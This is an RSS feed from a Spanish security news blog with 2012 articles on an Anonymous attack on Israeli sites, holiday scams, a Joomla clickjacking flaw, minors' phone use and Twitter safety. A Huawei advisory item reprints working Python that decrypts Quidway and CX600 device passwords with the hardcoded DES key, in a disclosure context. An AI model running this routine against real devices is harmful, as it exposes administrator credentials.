<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>EnfoqueSeguro &#187; Rafa</title>
	<atom:link href="http://www.enfoqueseguro.com/author/rnunez/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.enfoqueseguro.com</link>
	<description>Artículos sobre seguridad informática.</description>
	<lastBuildDate>Tue, 18 Jun 2013 18:07:10 +0000</lastBuildDate>
	<language>es-ES</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Un ataque de #Anonymous afecta a un centenar de páginas israelíes</title>
		<link>http://www.enfoqueseguro.com/un-ataque-de-anonymous-afecta-a-un-centenar-de-paginas-israelies/2012/11/18/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/un-ataque-de-anonymous-afecta-a-un-centenar-de-paginas-israelies/2012/11/18/#comments</comments>
		<pubDate>Sun, 18 Nov 2012 19:36:06 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Ciberguerra]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[cyberwar]]></category>
		<category><![CDATA[gaza]]></category>
		<category><![CDATA[israel]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=7481</guid>
		<description><![CDATA[Los &#8216;hackers&#8217; se vengan así por la ofensiva israelí sobre la Franja de Gaza:  Los ‘hackers’ del grupo Anonymous han realizado un ataque cibernético contra un centenar de páginas web israelíes en protesta por la operación militar de Israel en la Franja de Gaza. Los piratas informáticos anunciaron el ataque denominado Operación Israel a través [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="Anonymous Israel" src="http://actualidad.rt.com/actualidad/public_images/dd9/dd983961956609cf2b2ed7d3d472eb0f_article.png" alt="" width="476" height="268" />Los &#8216;hackers&#8217; se vengan así por la ofensiva israelí sobre la Franja de Gaza:  Los ‘hackers’ del grupo Anonymous han realizado un ataque cibernético contra un centenar de páginas web israelíes en protesta por la operación militar de Israel en la Franja de Gaza. Los piratas informáticos anunciaron el ataque denominado Operación Israel a través de una de sus cuentas de Twitter y publicaron una lista de más de 90 sitio web israelíes que dejaron fuera de servicio.   Esta nueva serie de ataques antiisraelíes se realiza debido a la amenaza de que Israel pudiera bloquear las telecomunicaciones en la Franja de Gaza. A través de un vídeo publicado en YouTube, los ‘hackers’ han declarado la guerra al Gobierno israelí por haber atacado Gaza.    El pasado 14 de noviembre Israel también optó<span id="more-7481"></span> por Twitter y YouTube para anunciar un bombardeo masivo en la Franja de Gaza. Aunque Tel Aviv sostiene que sus ataques van dirigidos contra las infraestructuras de los que considera terroristas, entre las 26 víctimas mortales del conflicto hay varios niños y adultos civiles. En respuesta a la agresión israelí, los brazos armados de los grupos Hamás y Yihad Islámica, realizan ataques de artillería contra Israel y varios de sus cohetes han alcanzado las inmediaciones de Tel Aviv.  Por primera vez desde 1991, sonaron las sirenas de advertencia de ataque aéreo en aquella ciudad. El Ejército israelí anunció que comienza la movilización de las decenas de miles de reservistas que necesita para emprender una operación terrestre en la Franja de Gaza.</p>
<p>Fuente: <a href="http://actualidad.rt.com/actualidad/view/78619-ataque-anonymous-afecta-centenar-paginas-israelies">http://actualidad.rt.com/actualidad/view/78619-ataque-anonymous-afecta-centenar-paginas-israelies</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/un-ataque-de-anonymous-afecta-a-un-centenar-de-paginas-israelies/2012/11/18/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Cifrado débil de contraseñas en productos Huawei</title>
		<link>http://www.enfoqueseguro.com/cifrado-debil-de-contrasenas-en-productos-huawei/2012/11/16/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/cifrado-debil-de-contrasenas-en-productos-huawei/2012/11/16/#comments</comments>
		<pubDate>Fri, 16 Nov 2012 13:08:53 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Educación]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[contraseña]]></category>
		<category><![CDATA[Huawei]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=7478</guid>
		<description><![CDATA[Huawei es un fabricante chino de equipos destinados a la gestión de redes y telecomunicaciones, aunque últimamente están adentrándose en el mundo de los smartphones y las tablets. Se ha descubierto que cifra las contraseñas de los productos de manera muy débil. Hay diferentes maneras de almacenar contraseñas por parte de los dispositivos y sistemas. Una [...]]]></description>
				<content:encoded><![CDATA[<div>Huawei es un fabricante chino de equipos destinados a la gestión de redes y telecomunicaciones, aunque últimamente están adentrándose en el mundo de los smartphones y las tablets. Se ha descubierto que <strong>cifra las contraseñas de los productos de manera muy débil</strong>.</div>
<div></div>
<div>Hay diferentes maneras de almacenar contraseñas por parte de los dispositivos y sistemas. Una muy común es utilizar un hash de la contraseña. En el momento de verificar si un usuario es quien dice ser, a la contraseña introducida se le aplica la misma función hash que se usó a la hora de su almacenamiento. Si la cadena resultante es igual a la almacenada, se valida. Con este sistema no se guarda la contraseña en claro en ningún momento.</div>
<div></div>
<div>También es muy común usar &#8220;<em>sal</em>&#8221; para generar estos hashes. Así, una de las entradas de la función hash sería la clave y otra la &#8220;<em>sal</em>&#8220;, (que sólo se trata de ciertos bit aleatorios). Con esto se consiguen mitigar la eficacia de los ataques por diccionario.</div>
<div></div>
<div>Huawei no usa <span id="more-7478"></span>ninguno de estos métodos. <a href="http://seclists.org/bugtraq/2012/Nov/45">El problema, descubierto por Roberto Paleari e Ivan Speziale</a> reside en que <strong>los dispositivos usan un cifrado simétrico (algoritmo DES) con una misma clave de cifrado compartida entre todos los dispositivos </strong>(&#8216;\x01\x02\x03\x04\x05\x06\x07\x08&#8242;). No se trata de una vulnerabilidad como tal, sino de un fallo de diseño por parte del fabricante por usar contraseñas comunes y no aleatorias para cada dispositivo.</div>
<div></div>
<div>Los investigadores han publicado este código en Python para <strong>extraer las contraseñas en claro</strong>, llamando a la función &#8216;<em>decrypt_password</em>&#8216;</div>
<div></div>
<div></div>
<pre>from Crypto.Cipher import DES

def decode_char(c):
    if c == 'a':
        r = '?'
    else:
        r = c
    return ord(r) - ord('!')

def ascii_to_binary(s):
    assert len(s) == 24

    out = [0]*18
    i = 0
    j = 0

    for i in range(0, len(s), 4):
        y = decode_char(s[i + 0])
        y = (y &lt;&lt; 6) &amp; 0xffffff

        k = decode_char(s[i + 1])
        y = (y | k) &amp; 0xffffff
        y = (y &lt;&lt; 6) &amp; 0xffffff

        k = decode_char(s[i + 2])
        y = (y | k) &amp; 0xffffff
        y = (y &lt;&lt; 6) &amp; 0xffffff

        k = decode_char(s[i + 3])
        y = (y | k) &amp; 0xffffff

        out[j+2] = chr(y       &amp; 0xff)
        out[j+1] = chr((y&gt;&gt;8)  &amp; 0xff)
        out[j+0] = chr((y&gt;&gt;16) &amp; 0xff)

        j += 3

    return "".join(out)

def decrypt_password(p):
    r = ascii_to_binary(p)

    r = r[:16]

    d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
    r = d.decrypt(r)

    return r.rstrip("\x00")</pre>
<p>&nbsp;</p>
<div></div>
<div>El algoritmo de cifrado usado es DES con ECB (Electronic codebook), que <strong>es el método más simple al usar el algoritmo DES.</strong></div>
<div></div>
<div>En primer lugar el algoritmo transforma los caracteres ascii de la contraseña cifrada a binario (función ascii_to_binary), y posteriormente se queda con los 16 primeros bytes, eliminando el resto.</div>
<div></div>
<div>A continuación aplica el descifrado del algoritmo DES en modo ECB con la clave \x01\x02\x03\x04\x05\x06\x07\x08 y elimina los caracteres NUL del final de la contraseña.</div>
<div></div>
<div>El error ha sido <strong>confirmado en los productos de la familia Quidway y en los CX600 </strong>(routers y switches), aunque puede existir en más productos afectados.</div>
<div></div>
<div>En <a href="http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141">el comunicado oficial delfabricante </a>se recomienda, como remedio temporal, <strong>limitar el acceso a los routers</strong> a los usuarios dentro de la red interna, gestionar estrictamente los privilegios de las cuentas y cambiar las contraseñas con regularidad.</div>
<div></div>
<div>El fabricante ha asignado la referencia Huawei-SA-20120827-01-CX600 al fallo.</div>
<div></div>
<div><strong>Más información:</strong></div>
<div></div>
<div>Seclists.org &#8211; Weak password encryption on Huawei products</div>
<div><a href="http://seclists.org/bugtraq/2012/Nov/45">http://seclists.org/bugtraq/2012/Nov/45</a></div>
<div></div>
<div>Huawei &#8211; Updated Security Advisory on the Risk of Password Being Cracked Due to DES Encryption Algorithm</div>
<div><a href="http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141">http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141</a></div>
<div></div>
<div></div>
<div align="right">Antonio Sánchez</div>
<div align="right"><a href="mailto:asanchez@hispasec.com#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed">asanchez@hispasec.com</a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/cifrado-debil-de-contrasenas-en-productos-huawei/2012/11/16/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Los cibertimos que nos acecharán en Navidad</title>
		<link>http://www.enfoqueseguro.com/los-cibertimos-que-nos-acecharan-en-navidad/2012/11/15/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/los-cibertimos-que-nos-acecharan-en-navidad/2012/11/15/#comments</comments>
		<pubDate>Thu, 15 Nov 2012 22:42:20 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Cibercrimen]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Navidad]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=7474</guid>
		<description><![CDATA[Ya quedan pocas semanas para Navidad, y este año serán aún más los usuarios que realizarán sus compras a través de internet desde su PC, su tableta o su teléfono móvil. Por este motivo, McAfee quiere compartir con todos ellos una serie de advertencias y recomendaciones, denominadas 12 Timos de Navidad, para que sus compras [...]]]></description>
				<content:encoded><![CDATA[<h1><img class="alignleft" style="margin-left: 10px; margin-right: 10px;" src="http://www.laflecha.net/cache/thumbnails/k/250x220/storage/news/0064/290_christmas-laptop.jpg" alt="" width="250" height="166" /></h1>
<div>
<div>
<div>
<div>
<div>
<p>Ya quedan pocas semanas para Navidad, y este año serán aún más los usuarios que realizarán sus compras a través de internet desde su PC, su tableta o su teléfono móvil. Por este motivo, McAfee quiere compartir con todos ellos una serie de advertencias y recomendaciones, denominadas 12 Timos de Navidad, para que sus compras sean totalmente seguras. Según un reciente estudio de McAfee realizado en los Estados Unidos sobre los hábitos de compra de cara a la Navidad, el 70% de los encuestados afirman que tienen planeado realizar sus compras navideñas a través de internet, y sorprendentemente 1 de cada 4 (24%) lo hará desde su dispositivo móvil. En este sentido es muy llamativo el hecho de que el 87% de los encuestados que poseen un tablet o smartphone de algún modo son conscientes de que sus datos personales podrían ser<span id="more-7474"></span> robados mientras utilizan alguna aplicación en sus dispositivos móviles, y 9 de cada 10 de estos usuarios no les importa facilitar cierto nivel de información personal si obtienen un beneficio a cambio, a pesar de no contar con la protección adecuada en sus dispositivos.</p>
</div>
<div> Para todos ellos, McAfee describe los timos más peligrosos online.</div>
</div>
</div>
</div>
</div>
<div>
<p>Los 12 timos de Navidad según McAfee:</p>
<p>Timos en redes sociales &#8211; Muchos de nosotros utilizamos redes sociales para mantener contacto con nuestros familiares, amigos, y compañeros de trabajo durante las vacaciones, y los cibercriminales saben que este es un buen lugar para pillarnos desprevenidos porque nos sentimos seguros, entre amigos. Estos son algunos ejemplos de cómo utilizan estos canales para obtener dinero e información personal:</p>
<ul>
<li>A menudo utilizan Facebook y Twitter como páginas web y correo electrónico para atacar a los usuarios durante las vacaciones. Ten cuidado cuando hagas clic o &#8220;me gusta&#8221; en posts, participes en sorteos y acciones especiales que te envíen tus &#8220;amigos&#8221;, especialmente en los que puedas conseguir extraordinarios regalos (como un nuevo iPad Mini), descuentos exclusivos, o increíbles ofertas laborales para trabajar en Navidad, porque las cuentas de tus amigos pueden haber sido hackeadas y estén enviando ese tipo de falsas alertas a todos su contactos.</li>
<li>La publicidad en Twitter y los descuentos especiales son numerosos durante la semana del Black Friday y el Cyber Monday. En estos casos utilizan enlaces acortados que podrían ser fácilmente maliciosos. Los criminales hilan muy fino y crean publicidad que parece auténtica con la que dirigen a los consumidores hacia páginas web de apariencia real. De este modo consiguen fácilmente datos personales e incluso los números de tarjetas de crédito, teléfonos y direcciones.</li>
</ul>
<p>Aplicaciones maliciosas para dispositivos móviles &#8211; Las descargas de aplicaciones para móviles van en aumento y son un verdadero boom, como así lo reflejan los 25 millones de descargas de aplicaciones* solo para dispositivos Android. Pero a medida que crece la popularidad de estas aplicaciones, también lo hacen las posibilidades de descargar aplicaciones maliciosas con apariencia real que roban información o que envían mensajes de texto sin el consentimiento del usuario.</p>
<p>Timos de viajes &#8211; Antes de reservar tu billete de avión o tu hotel para visitar a tu familia, recuerda que los ciberdelincuentes están deseando atraparte con ofertas &#8220;demasiado buenas para ser verdad&#8221;. Falsas webs de viajes a menudo utilizan la apariencia de tu agencia preferida, con preciosas fotos y precios increíbles con la finalidad de obtener tus datos bancarios.</p>
<p>Spam y timos de phishing en Navidad &#8211; Muchos de estos mensajes de spam llegan enmascarados por temas navideños. Relojes Rolex muy baratos y productos farmacéuticos se anuncian como el &#8220;regalo perfecto&#8221; para estas fiestas.</p>
<p>iPhone 5, iPad Mini y otros timos de regalos estrella- Los cibercriminales aprovechan la expectación alrededor de los nuevos iPhone 5 e iPad Mini para extender sus timos. Ellos van a utilizar estos productos estrella en enlaces peligrosos y falsos concursos (ejemplo &#8220;gratis un iPad&#8221;). De este modo llaman la atención de los usuarios para conseguir los detalles de sus tarjetas de crédito o con el propósito de que hagan clic en enlaces desde los que podrían descargarse malware.</p>
<p>Mensajes a través de Skype &#8211; Cada vez está más extendido el uso de Skype para contactar con los seres queridos durante las vacaciones de Navidad, pero es importante tener cuidado con nuevos mensajes a través de Skype que pretenden infectar los equipos o incluso apoderarse de los archivos para solicitar un rescate.</p>
<p>Falsas tarjetas de regalo &#8211; Los cibercriminales también están ofreciendo tarjetas de regalo online para conseguir sus propósitos. Ten cuidado si tienes pensado comprar tarjetas de regalo estas Navidades. Imagínate que embarazoso sería entregar una tarjeta de regalo falsa a tu suegra como regalo de Reyes.</p>
<p>SMiShing Navideño-&#8221;SMiSishing&#8221; es phishing a través de mensaje de texto. Como en un mensaje de phishing, el criminal intenta que reveles información o que realices alguna acción que normalmente no harías fingiendo ser una organización legítima.</p>
<p>Falsos E-tailers- Se trata de falsas tiendas de comercio electrónico que, bajo apariencia real, tratan de atraerte para que facilites tu número de tarjeta de crédito y otros detalles personales, a cambio de grandes ventajas. Pero la realidad es que después de obtener tu información y tu dinero, no recibirás nunca los productos comprados, y toda tu información personal estará expuesta y en peligro.</p>
<p>Falsas obras de caridad-Este es uno de los grandes timos cada Navidad. Durante esta época los ciberdelincuentes aprovechan los buenos sentimientos de las personas para invitarnos a participar en falsas obras de caridad.</p>
<p>Felicitaciones electrónicas peligrosas &#8211; Las tarjetas de felicitación electrónicas son cada vez más populares y la forma más rápida y sencilla de felicitar la Navidad a nuestros seres más queridos. Pero en algunas ocasiones pueden ser maliciosas y contener virus o spyware que se descarga en el ordenador una vez que haces clic en el enlace para ver la felicitación.</p>
<p>Falsos anuncios por palabras &#8211; Los sitios de anuncios por palabras online pueden ser interesantes para buscar regalos o empleos temporales durante las vacaciones navideñas, pero hay que tener cuidado con las falsas ofertas que piden demasiada información personal o incluso dinero a través de Western Union, ya que se trata de uno de los timos más frecuentes.</p>
<p>Según un estudio global realizado por MSI International y McAfee, los consumidores poseen activos digitales por un valor aproximado de 37.438 dólares en todos sus dispositivos, aunque más de una tercera parte no disponen de protección en todos sus dispositivos.</p>
<p>&#8220;Utilizar múltiples dispositivos proporciona a los ciberdelincuentes más vías de acceso a la valiosa información de los usuarios, como datos personales, documentos, especialmente si los dispositivos no tienen protección&#8221;, afirma Paula Greve, directora de McAfee Labs. &#8220;Una de las mejores formas de que los consumidores se protejan es conociendo el comportamiento de los criminales y sus trucos, de forma que puedan evitarlos en la medida de lo posible. Queremos que los consumidores estén alerta, especialmente durante estas fechas en las que todos estaremos muy ocupados.&#8221;</p>
<p>&#8220;Para los millones de consumidores que planean realizar sus compras a través de internet, organizar sus viajes y actualizar sus redes sociales, es importante recordar que pueden realizar todas estas actividades de forma segura simplemente asegurándose de que sus ordenadores y sus dispositivos móviles están protegidos adecuadamente&#8221;, comenta Gary Davis, vicepresidente de McAfee Global Consumer Marketing. &#8220;Para mantener su información personal y financiera segura es importante no sucumbir ante ofertas que son demasiado buenas para ser reales, no hacer clic en enlaces s abrir archivos de personas y empresas cuyas direcciones de email no conocemos o nos resultan sospechosas.&#8221;</p>
<p>www.laflecha.net</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/los-cibertimos-que-nos-acecharan-en-navidad/2012/11/15/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Salto de restricciones con &#8220;clickjacking&#8221; en Joomla!</title>
		<link>http://www.enfoqueseguro.com/salto-de-restricciones-con-clickjacking-en-joomla/2012/11/14/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/salto-de-restricciones-con-clickjacking-en-joomla/2012/11/14/#comments</comments>
		<pubDate>Wed, 14 Nov 2012 14:06:50 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Aplicaciones]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[clickjacking]]></category>
		<category><![CDATA[joomla]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=7468</guid>
		<description><![CDATA[Ajay Singh Negi ha descubierto un problema de seguridad en Joomla! que podría permitir a un atacante eludir restricciones de seguridad y ataques de cross-site request forgery (CSRF) a través de la técnica del &#8220;clickjacking&#8221; Joomla! es un sistema de gestión de contenidos o CMS, de código abierto y programado en su mayor parte en [...]]]></description>
				<content:encoded><![CDATA[<p><img class="alignleft size-medium wp-image-7469" style="margin-left: 10px; margin-right: 10px;" title="joomla-logo" src="http://www.enfoqueseguro.com/wp-content/uploads/2012/11/joomla-logo-300x205.png" alt="" width="300" height="205" />Ajay Singh Negi ha descubierto un problema de seguridad en Joomla! que podría permitir a un atacante eludir restricciones de seguridad y ataques de cross-site request forgery (CSRF) a través de la técnica del &#8220;clickjacking&#8221;</p>
<p>Joomla! es un sistema de gestión de contenidos o CMS, de código abierto y programado en su mayor parte en PHP. Es muy utilizado para la creación de portales y sitios web. La gran cantidad de extensiones existentes y su fácil integración con el sistema proporcionan un gran potencial a este CMS.<br />
CSRF es una técnica que permitiría realizar peticiones HTTP sin una correcta validación. Por ejemplo<span id="more-7468"></span>, imaginemos que un usuario se encuentra validado en una página que necesita autenticación. Desde el navegador, visita otra web que esconde una petición HTTP hacia esa página que necesita validación. Esa petición HTTP, en forma de enlace, se carga por<br />
la víctima sin saberlo y realiza una acción sobre la página en la que se encuentra autenticada. Esto sería un fallo de CSRF por parte de la página que necesita autenticación, puesto que no valida correctamente que las peticiones provengan de sus propia plataforma. Para impedir esto, las páginas suelen introducir un sistema de control que impide que una petición desde otra web sea válida. A su vez, para eludir esto, los atacantes utilizan técnicas como clickjacking (un  término acuñado en 2008), que permite realizar ataques CSRF aunque se hayan implementado ciertas técnicas para evitarlo.</p>
<p>El clickjacking puede también ser usado para referirse a cualquier tipo de técnica que implique el que un usuario interactúe con una web creyendo que en realidad lo está haciendo con otra.</p>
<p>El problema es que Joomla! permite a cualquier usuario realizar acciones a través de peticiones HTTP que no son convenientemente validadas. Si un usuario visita un enlace especialmente manipulado hacia una plataforma<br />
Joomla!, se podrían realizar acciones sobre el portal y el atacante podría así eludir restricciones de seguridad. No se han dado más detalles sobre la vulnerabilidad, pero probablemente permitiría que un usuario suplantase a otro sin necesidad de conocer la contraseña.</p>
<p>Esta fallo se da en las versiones 2.5.7 y anteriores. Se ha solucionado en la versión 2.5.8 disponible desde <a href="http://www.joomla.org/" target="_blank">www.joomla.org</a></p>
<p>Opina sobre esta noticia:<br />
<a href="http://unaaldia.hispasec.com/2012/11/salto-de-restricciones-con-clickjacking.html#comments" target="_blank">http://unaaldia.hispasec.com/<wbr>2012/11/salto-de-<wbr>restricciones-con-<wbr>clickjacking.html#comments</wbr></wbr></wbr></a></p>
<p>Más información:</p>
<p>[20121102] &#8211; Core &#8211; Clickjacking<br />
<a href="http://developer.joomla.org/security/news/544-20121102-core-clickjacking.html" target="_blank">http://developer.joomla.org/<wbr>security/news/544-20121102-<wbr>core-clickjacking.html</wbr></wbr></a></p>
<p>Sergio de los Santos<br />
<a href="mailto:ssantos@hispasec.com#utm_source=feed&amp;utm_medium=feed&amp;utm_campaign=feed">ssantos@hispasec.com</a><br />
Twitter: @ssantosv</p>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/salto-de-restricciones-con-clickjacking-en-joomla/2012/11/14/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Un estudio propone registrar la edad del menor que compre un móvil</title>
		<link>http://www.enfoqueseguro.com/un-estudio-propone-registrar-la-edad-del-menor-que-compre-un-movil/2012/11/13/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/un-estudio-propone-registrar-la-edad-del-menor-que-compre-un-movil/2012/11/13/#comments</comments>
		<pubDate>Tue, 13 Nov 2012 17:33:32 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Mòvil]]></category>
		<category><![CDATA[Privacidad]]></category>
		<category><![CDATA[Seguridad Extra]]></category>
		<category><![CDATA[Smartphones]]></category>
		<category><![CDATA[edad]]></category>
		<category><![CDATA[Niños]]></category>
		<category><![CDATA[recomendaciones]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=7452</guid>
		<description><![CDATA[Los operadores de telefonía móvil deberían verificar mejor la edad de los niños y jóvenes cuando acceden a los servicios multimedia, y una solución sería llevar un registro con el año de nacimiento de los usuarios. Así lo recomienda un informe elaborado por investigadores de la Universidad Politécnica de Valencia, que también plantea clasificar los [...]]]></description>
				<content:encoded><![CDATA[<div>
<div><img class="alignleft" style="margin-left: 10px; margin-right: 10px;" src="http://www.laflecha.net/cache/thumbnails/k/250x220/storage/news/0064/229_joven.jpg" alt="" width="196" height="220" />Los operadores de telefonía móvil deberían verificar mejor la edad de los niños y jóvenes cuando acceden a los servicios multimedia, y una solución sería llevar un registro con el año de nacimiento de los usuarios. Así lo recomienda un informe elaborado por investigadores de la Universidad Politécnica de Valencia, que también plantea clasificar los contenidos para móviles por edades, como se hace con los videojuegos.</p>
</div>
</div>
<p>La verificación de la edad a la hora de acceder a los servicios móviles no es efectivo porque siempre queda la posibilidad de que la niña o el niño falseen la casilla correspondiente&#8221;, comenta a SINC María de Miguel Molina, profesora de la Universidad Politécnica de Valencia.</p>
<div>
<p>&#8220;Sin embargo los operadores podrían saber la edad de sus usuarios menores si los padres lo<span id="more-7452"></span> indicaran cuando les compran el móvil y quedara registrado&#8221;, añade la investigadora, que ha dirigido un estudio sobre los servicios móviles dirigidos a niños en España.</p>
<p>Su informe, que publica la revista <em>Quality &amp; Quantity</em>, señala que si se adoptara esta medida se podría filtrar y bloquear el acceso a los sitios para adultos o a otros contenidos no aptos para los menores. Para ello habría que establecer normas comunes entre los operadores.</p>
<p>Actualmente la mayoría de las compañías que operan en España han firmado el código de autorregulación de la Asociación de Empresas de Servicios a Móviles (AESAM), que establece apoyar un &#8220;acceso responsable&#8221; a los contenidos. Aun así, el estudio considera que no es suficiente, y que debería ser más específico respecto a la infancia.</p>
<p>Los investigadores también recomiendan crear un esquema de clasificación según las edades de los usuarios y la temática de los servicios, de forma parecida a la que ya existe para los videojuegos: la Pan European Game Information (PEGI), que recomienda los juegos para niños o jóvenes de 3, 7, 12, 16 y más de 18 años.</p>
<p><strong>Recomendaciones al Gobierno</strong></p>
<p>Los resultados del trabajo -elaborado a partir de encuestas remitidas a las compañías, agencias gubernamentales y asociaciones de protección del menor- también sugieren al Gobierno español promover, en entornos familiares y escolares, campañas de concienciación sobre el buen uso del móvil.</p>
<p>Además, se subraya la necesidad de alcanzar acuerdos con los operadores para que cuenten con la opinión de los padres e incorporen servicios de filtrado. Estos incluirían prohibiciones de acceso y descarga a fotografías y videos pornográficos, restricciones en el envío de SMS y MMS, evitar las compras, así como la participación en concursos y competiciones.</p>
<p>&#8220;Hasta ahora creíamos que podíamos controlar el acceso de los menores a internet desde el ordenador de casa, poniéndolo en un lugar visible -por ejemplo- y vigilando lo que hacen, pero el uso de los <em>smartphones</em> abre nuevas vías&#8221;, advierte De Miguel, quien también destaca el avance en los últimos años de las aplicaciones (apps) específicas para móvil y, sobre todo, de las redes sociales -como Tuenti y Facebook- entre los menores.</p>
<p>Los menores de 14 años que acceden a las redes sociales lo hacen en contra de la ley</p>
<p>&#8220;Uno de los mayores problemas es que pueden acceder fácilmente los niños y niñas con menos de 14 años, aunque la legislación española no lo permite&#8221;, subraya la investigadora. &#8220;Y en este sentido, el único recurso disponible podría ser el DNI electrónico, pero queda lejos su posible aplicación a corto plazo&#8221;.</p>
<p>En cualquier caso, si el menor tiene más de 14 años y proporciona su verdadera identidad, &#8220;entonces la red social es responsable, no solo legalmente sino también socialmente, de que toda protección sea poca para que el usuario disfrute de este medio sin problemas&#8221;.</p>
<p>Los investigadores apelan a la voluntad de las redes sociales para implantar medidas como perfiles cerrados por defecto, uso de contraseñas y una información clara, además de enseñar al menor a moverse en las redes con seguridad y a proteger su privacidad.</p>
<div></div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enfoqueseguro.com/un-estudio-propone-registrar-la-edad-del-menor-que-compre-un-movil/2012/11/13/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>¿Cómo puedo mantener mi cuenta de Twitter segura y privada?</title>
		<link>http://www.enfoqueseguro.com/como-puedo-mantener-mi-cuenta-de-twitter-segura-y-privada/2012/04/30/#utm_source=feed&#038;utm_medium=feed&#038;utm_campaign=feed</link>
		<comments>http://www.enfoqueseguro.com/como-puedo-mantener-mi-cuenta-de-twitter-segura-y-privada/2012/04/30/#comments</comments>
		<pubDate>Mon, 30 Apr 2012 11:33:45 +0000</pubDate>
		<dc:creator>Rafa</dc:creator>
				<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Privacidad]]></category>
		<category><![CDATA[Redes sociales]]></category>
		<category><![CDATA[Seguridad Extra]]></category>

		<guid isPermaLink="false">http://www.enfoqueseguro.com/?p=4298</guid>
		<description><![CDATA[Muchos usuarios nos preguntan, &#8220;¿cómo puedo mantener mi cuenta de Twitter segura y privada?&#8221;. ¡Es una excelente pregunta! Primero, debes saber que los intentos por &#8220;hackear&#8221; una cuenta de Twitter directamente son extremadamente raros. La mayoría de las cuentas comprometidas son el resultado directo de engaños de &#8220;Phishing&#8221;. Phishing es una forma de engañar a [...]]]></description>
				<content:encoded><![CDATA[<p>Muchos usuarios nos preguntan, &#8220;¿cómo puedo mantener mi cuenta de Twitter segura y privada?&#8221;. ¡Es una excelente pregunta!</p>
<p>Primero, debes saber que los intentos por &#8220;hackear&#8221; una cuenta de Twitter directamente son extremadamente raros. La mayoría de las cuentas comprometidas son el resultado directo de engaños de &#8220;Phishing&#8221;. Phishing es una forma de engañar a los usuarios enviándoles mensajes fraudulentos que buscan engañarlos para que revelen sus contraseñas. Este engaño puede venir en forma de un email falso, un archivo adjunto o una pantalla de inicio de sesión que estén diseñados para verse muy similares a tu página de inicio de Twitter.</p>
<p>También debes saber que Twitter nunca te envía correos que pidan tu contraseña o que descargues archivos. Nunca debes escribir tu contraseña en una pantalla web que no sea de Twitter, o una aplicación en la que confíes. Siempre puedes asegurarte de que estás en Twitter fijándote en la dirección <span id="more-4298"></span>en la barra de URLs de tu navegador, para asegurarte de que el dominio es Twitter.com. Hay mucho más que puedes hacer para protegerte de los intentos de phishing en nuestras <a href="https://support.twitter.com/">páginas de Ayuda. </a></p>
<p>Aquí hay algunas recomendaciones adicionales de nuestro <a href="https://support.twitter.com/groups/33-report-a-violation#topic_166">Centro de Seguridad</a>:</p>
<ul>
<li>Usa una contraseña fuerte con al menos 10 caracteres y una combinación de letras, números y símbolos para tu cuenta de Twitter. Usa una contraseña única para cada uno de los sitios web que usas (email, banca electrónica etc). De esta forma si una cuenta es comprometida, las otras estarán seguras. Una cuenta de correo electrónico comprometida es la segunda forma más común en la que un intruso puede ganar acceso a tu cuenta de Twitter.</li>
